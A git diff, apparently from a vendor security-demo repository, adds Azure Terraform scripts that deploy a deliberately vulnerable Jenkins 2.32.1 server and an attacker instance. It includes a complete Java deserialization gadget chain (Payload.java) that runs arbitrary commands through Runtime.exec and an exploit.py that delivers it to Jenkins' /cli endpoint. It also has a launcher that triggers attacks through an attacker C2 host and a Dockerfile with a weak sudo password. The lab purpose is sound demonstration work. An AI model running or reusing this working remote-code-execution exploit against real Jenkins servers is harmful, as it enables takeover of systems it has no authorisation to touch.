tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = tf.output('MGT-IP-FW-1') + + logger.info("Got these values from output \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebInFWConf failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-working/destroy-old.py b/azure/Jenkins_proj-working/destroy-old.py new file mode 100644 index 00000000..305e8925 --- /dev/null +++ b/azure/Jenkins_proj-working/destroy-old.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + WebInBootstrap_vars.update({'RG_Name': rg_name}) + WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) + + tf = Terraform(working_dir='./WebInBootstrap') + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("WebInBootstrap destroyed") + deployment_status = {'WebInDeploy': 'Fail'} + + exit() + else: + deployment_status = {'WebInDeploy': 'Success'} + exit() + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/azure/Jenkins_proj-working/destroy.py b/azure/Jenkins_proj-working/destroy.py new file mode 100644 index 00000000..3bc6b81b --- /dev/null +++ b/azure/Jenkins_proj-working/destroy.py @@ -0,0 +1,125 @@ + +from azure.cli.core import get_default_cli +import sys +import tempfile +import argparse +import logging +import subprocess +import os + +from python_terraform import Terraform + +logger = logging.getLogger() +# handler = logging.StreamHandler() +# formatter = logging.Formatter('%(levelname)-8s %(message)s') +# handler.setFormatter(formatter) +# logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +# +# Usage azure_login.py -g rgname +# + +sys.sterr = sys.stdout + +print('Logging in to Azure using device code') + +def run_cmd(cmd): + subprocess.call('az login', shell=True) + res = subprocess.call(cmd, shell=True) + print ('Result is {}'.format(res)) + + +def delete_file(fpath): + if os.path.exists(fpath): + try: + os.remove(fpath) + print ('Removed state file {}'.format(fpath)) + except Exception as e: + print ('Unable to delete the file {} got error {}'.format(fpath, e)) + else: + print('No need to delete {} as it no longer exists'.format(fpath)) + +def az_cli(args_str): + temp = tempfile.TemporaryFile() + args = args_str.split() + logger.debug('Sending cli command {}'.format(args)) + code = get_default_cli().invoke(args, None, temp) + # temp.seek(0) + data = temp.read().strip() + temp.close() + return [code, data] + +def delete_rg(rg_name): + logger.info('Deleting resource group {}'.format(rg_name)) + cmd = 'group delete --name ' + rg_name + ' --yes' + code, data = az_cli(cmd) + if code == 0: + print ('Successfully deleted Rg {} {}'.format(code,rg_name)) + +def delete_state_files(working_dir, file_list): + """ + + :param working_dir: string + :param tfstate_files: list of files + :return: True or False + + Removes a list of files from a directory + + """ + for file_name in file_list: + fpath = working_dir + file_name + if os.path.exists(fpath): + delete_file(fpath) + else: + print('Already deleted file {}'.format(fpath)) + +def main (username, password): + #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) + # + # Destroy Infrastructure + # + tfstate_file = 'terraform.tfstate' + tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup'] + + fpath = './WebInDeploy/' + tfstate_file + if os.path.isfile(fpath): + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + rg_name1 = tf.output('Attacker_RG_Name') + delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInDeploy + # + delete_state_files('./WebInDeploy/', tfstate_files) + + + fpath = './WebInBootstrap/' + tfstate_file + if os.path.isfile(fpath): + delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInBootstrap + # + delete_state_files('./WebInBootstrap/', tfstate_files) + + + # + # Delete state files WebInFWConf + # + delete_state_files('./WebInFWConf/', tfstate_files) + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + args = parser.parse_args() + username = args.username + password = args.password + # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) + main(username, password) diff --git a/azure/Jenkins_proj-working/jenkins/Dockerfile b/azure/Jenkins_proj-working/jenkins/Dockerfile new file mode 100644 index 00000000..1dea80e9 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/Dockerfile @@ -0,0 +1,38 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/* + + +ENV JENKINS_HOME /var/jenkins_home +ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log + +RUN groupadd -g 1000 jenkins \ + && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \ + && adduser jenkins sudo \ + && echo 'jenkins:jenkins' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +ENV JENKINS_VERSION 2.32.1 +RUN set -ex \ + && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ + && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ + && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref + +EXPOSE 8080 +EXPOSE 50000 + +COPY jenkins.sh /usr/local/bin/jenkins.sh + +RUN chmod +x /usr/local/bin/jenkins.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] + +CMD ["/usr/local/bin/jenkins.sh"] diff --git a/azure/Jenkins_proj-working/jenkins/config.xml b/azure/Jenkins_proj-working/jenkins/config.xml new file mode 100644 index 00000000..071c4fb7 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/config.xml @@ -0,0 +1,35 @@ + + + admin admin + + + N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq + + + + + + All + false + false + + + + + + default + + + + + + false + + + bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46 + + + admin@admin.com + + + diff --git a/azure/Jenkins_proj-working/jenkins/docker-compose.yml b/azure/Jenkins_proj-working/jenkins/docker-compose.yml new file mode 100644 index 00000000..61334042 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/docker-compose.yml @@ -0,0 +1,11 @@ +version: '3' +services: + jenkins: + build: . + container_name: jenkins + environment: + JAVA_OPTS: "-Djava.awt.headless=true" + JAVA_OPTS: "-Djenkins.install.runSetupWizard=false" + ports: + - "50000:50000" + - "8080:8080" diff --git a/azure/Jenkins_proj-working/jenkins/jenkins.sh b/azure/Jenkins_proj-working/jenkins/jenkins.sh new file mode 100644 index 00000000..b44f6ba2 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/jenkins.sh @@ -0,0 +1,24 @@ +#! /bin/bash -e + +: "${JENKINS_HOME:="/var/jenkins_home"}" +touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; } +echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG" + +# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + # read JAVA_OPTS and JENKINS_OPTS into arrays + java_opts_array=() + while IFS= read -r -d '' item; do + java_opts_array+=( "$item" ) + done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS") + + jenkins_opts_array=( ) + while IFS= read -r -d '' item; do + jenkins_opts_array+=( "$item" ) + done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS") + + exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@" +fi + +exec "$@" diff --git a/azure/Jenkins_proj-working/jenkins/tini b/azure/Jenkins_proj-working/jenkins/tini new file mode 100644 index 00000000..4e5b36a9 Binary files /dev/null and b/azure/Jenkins_proj-working/jenkins/tini differ diff --git a/azure/Jenkins_proj-working/launch_attack_vector.py b/azure/Jenkins_proj-working/launch_attack_vector.py new file mode 100644 index 00000000..dce17b39 --- /dev/null +++ b/azure/Jenkins_proj-working/launch_attack_vector.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(attack_vector: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + print(outputs) + if attack_vector == 'native': + print('Using native waf protected attack vector...\n') + target = outputs['NATIVE-DNS']['value'] + elif attack_vector == 'panos': + print('Using PAN-OS protected attack vector...\n') + target = outputs['ALB-DNS']['value'] + else: + print('malformed outputs!') + target = '127.0.0.1' + if 'ATTACKER_IP' not in outputs: + print('No attacker ip found in tf outputs!') + sys.exit(1) + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['attacker'] = attacker + payload['target'] = target + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Exploit Successfully Launched!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Launch Exploit!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC') + parser.add_argument('-c', '--vector', help='Attack Vector', required=True) + + args = parser.parse_args() + vector = args.vector + + main(vector) + diff --git a/azure/Jenkins_proj-working/payload/Payload.java b/azure/Jenkins_proj-working/payload/Payload.java new file mode 100644 index 00000000..cbd4c8b5 --- /dev/null +++ b/azure/Jenkins_proj-working/payload/Payload.java @@ -0,0 +1,189 @@ +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamException; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.PrivateKey; +import java.security.PublicKey; +import java.security.Signature; +import java.security.SignedObject; +import java.util.Comparator; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import java.util.concurrent.ConcurrentSkipListSet; +import java.util.concurrent.CopyOnWriteArraySet; + +import net.sf.json.JSONArray; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.collection.AbstractCollectionDecorator; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import org.apache.commons.collections.map.ReferenceMap; +import org.apache.commons.collections.set.ListOrderedSet; + +public class Payload implements Serializable { + + private Serializable payload; + + public Payload(String cmd) throws Exception { + + this.payload = this.setup(cmd); + + } + + public Serializable setup(String cmd) throws Exception { + final String[] execArgs = new String[] { cmd }; + + final Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + execArgs), new ConstantTransformer(1) }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + final Map innerMap = new HashMap(); + + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException e) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + + Field f2 = null; + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException e) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array2 = (Object[]) f2.get(innimpl); + + Object node = array2[0]; + if (node == null) { + node = array2[1]; + } + + Field keyField = null; + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception e) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField( + "key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + PublicKey publicKey = keyPair.getPublic(); + + Signature signature = Signature.getInstance(privateKey.getAlgorithm()); + SignedObject payload = new SignedObject(map, privateKey, signature); + JSONArray array = new JSONArray(); + + array.add("asdf"); + + ListOrderedSet set = new ListOrderedSet(); + Field f1 = AbstractCollectionDecorator.class + .getDeclaredField("collection"); + f1.setAccessible(true); + f1.set(set, array); + + DummyComperator comp = new DummyComperator(); + ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); + csls.add(payload); + + CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); + CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); + + a1.add(set); + Container c = new Container(csls); + a1.add(c); + + a2.add(csls); + a2.add(set); + + ReferenceMap flat3map = new ReferenceMap(); + flat3map.put(new Container(a1), "asdf"); + flat3map.put(new Container(a2), "asdf"); + + return flat3map; + } + + private Object writeReplace() throws ObjectStreamException { + return this.payload; + } + + static class Container implements Serializable { + + private Object o; + + public Container(Object o) { + this.o = o; + } + + private Object writeReplace() throws ObjectStreamException { + return o; + } + + } + + static class DummyComperator implements Comparator, Serializable { + + public int compare(Object arg0, Object arg1) { + // TODO Auto-generated method stub + return 0; + } + + private Object writeReplace() throws ObjectStreamException { + return null; + } + + } + + public static void main(String args[]) throws Exception{ + + if(args.length != 2){ + System.out.println("java -jar payload.jar outfile cmd"); + System.exit(0); + } + + String cmd = args[1]; + FileOutputStream out = new FileOutputStream(args[0]); + + Payload pwn = new Payload(cmd); + ObjectOutputStream oos = new ObjectOutputStream(out); + oos.writeObject(pwn); + oos.flush(); + out.flush(); + + + } + +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar new file mode 100644 index 00000000..218510bc Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar new file mode 100644 index 00000000..c35fa1fe Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar new file mode 100644 index 00000000..98467d3a Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar differ diff --git a/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar new file mode 100644 index 00000000..93a3b9f6 Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar differ diff --git a/azure/Jenkins_proj-working/payload/exploit.py b/azure/Jenkins_proj-working/payload/exploit.py new file mode 100644 index 00000000..89c789d4 --- /dev/null +++ b/azure/Jenkins_proj-working/payload/exploit.py @@ -0,0 +1,92 @@ +import urllib +import requests +import uuid +import threading +import time +import gzip +import urllib3 +import zlib +import subprocess + +proxies = { +# 'http': 'http://127.0.0.1:8085', +# 'https': 'http://127.0.0.1:8090', +} + +TARGET = input("Enter Jenkins Target IP Address: ") +URL='http://' + TARGET + ':80/cli' + +PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' +PROTO = b'\x00\x00\x00\x00' + + +FILE_SER = open("payload.ser", "rb").read() + +def download(url, session): + + headers = {'Side' : 'download'} + #headers['Content-type'] = 'application/x-www-form-urlencoded' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Session'] = session + headers['Transfer-Encoding'] = 'chunked' + r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) + print(r.content) + + +def upload(url, session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding'] = None + r = requests.post(url,data=data,headers=headers,proxies=proxies) + + +def upload_chunked(url,session, data): + + headers = {'Side' : 'upload'} + headers['Session'] = session + #headers['Content-type'] = 'application/octet-stream' + headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' + #headers['Content-Length'] = '335' + headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0' + headers['Accept-Encoding']= None + headers['Transfer-Encoding'] = 'chunked' + headers['Cache-Control'] = 'no-cache' + + r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies) + + +def null_payload(): + yield b" " + +def create_payload(): + payload = PREAMBLE + PROTO + FILE_SER + + return payload + +def create_payload_chunked(): + yield PREAMBLE + yield PROTO + yield FILE_SER + +def main(): + print("start") + + session = str(uuid.uuid4()) + + t = threading.Thread(target=download, args=(URL, session)) + t.start() + + time.sleep(1) + print("pwn") + #upload(URL, session, create_payload()) + + upload_chunked(URL, session, "asdf") + +if __name__ == "__main__": + main() diff --git a/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar new file mode 100644 index 00000000..30fad12d Binary files /dev/null and b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar differ diff --git a/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar new file mode 100644 index 00000000..a47f128a Binary files /dev/null and b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar differ diff --git a/azure/Jenkins_proj-working/payload/payload.jar b/azure/Jenkins_proj-working/payload/payload.jar new file mode 100644 index 00000000..51e0bcc9 Binary files /dev/null and b/azure/Jenkins_proj-working/payload/payload.jar differ diff --git a/azure/Jenkins_proj-working/requirements.txt b/azure/Jenkins_proj-working/requirements.txt new file mode 100644 index 00000000..c36b3a97 --- /dev/null +++ b/azure/Jenkins_proj-working/requirements.txt @@ -0,0 +1,227 @@ +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.7 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 +azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 +azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 +azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 